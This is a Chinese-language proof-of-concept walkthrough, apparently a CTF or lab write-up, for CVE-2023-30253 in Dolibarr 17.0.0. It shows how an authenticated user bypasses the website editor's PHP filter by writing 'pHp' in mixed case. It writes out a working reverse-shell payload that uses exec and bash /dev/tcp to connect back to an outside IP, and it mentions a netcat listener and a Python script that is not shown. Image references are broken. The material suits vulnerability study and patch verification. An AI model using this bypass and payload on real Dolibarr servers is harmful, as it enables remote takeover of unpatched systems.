
在Dolibarr 17.0.0中,启用CMS网站插件(核心)后,经过身份验证的攻击者可以通过绕过应用程序限制的PHP代码注入获得远程命令执行。
CVE-2023-30253 是 Dolibarr 软件中的一个安全漏洞,它允许经过身份验证的用户通过在被注入的数据中使用大写字母操作技巧来执行远程代码。
此漏洞可导致恶意行为者未经授权执行远程代码,对受影响系统的安全性和完整性构成严重威胁。 该漏洞已在 Dolibarr 17.0.1 版本中修复。
https://www.swascan.com/security-advisory-dolibarr-17-0-0/
https://github.com/Dolibarr/dolibarr
以下 POC 展示了如何手动获取反向 Shell。

以测试用户身份登录后,我们可以创建/修改网站。
.png)
首先创建一个网站,然后创建一个页面。
.png)

创建网站和页面后,点击双筒望远镜图标,这将在新标签页中打开我们创建的页面。
现在点击编辑 HTML 源代码。
.png)
在这里我们可以尝试添加 PHP 代码,但存在某种过滤器阻止我们编写 PHP 代码。 通过更改单词 php 的格式可以轻松绕过这一点。
.png)
将单词 php 的格式更改为 pHp 后,我们可以看到它已成功保存。
.png)
进入页面,我们可以看到插入的 PHP 代码正在运行。
现在要获取反向 Shell,让我们设置 netcat 监听器。
.png)
.png)
然后添加我们的反向 Shell 代码 <?pHp exec("/bin/bash -c 'bash -i > /dev/tcp/10.10.14.101/1010 0>&1'"); ?>
现在打开网站,就能获得反向 Shell。
.png)
我们可以使用 Python 代码来简化操作。

设置 netcat 监听器。

运行脚本,我们应该能获得一个反向 Shell。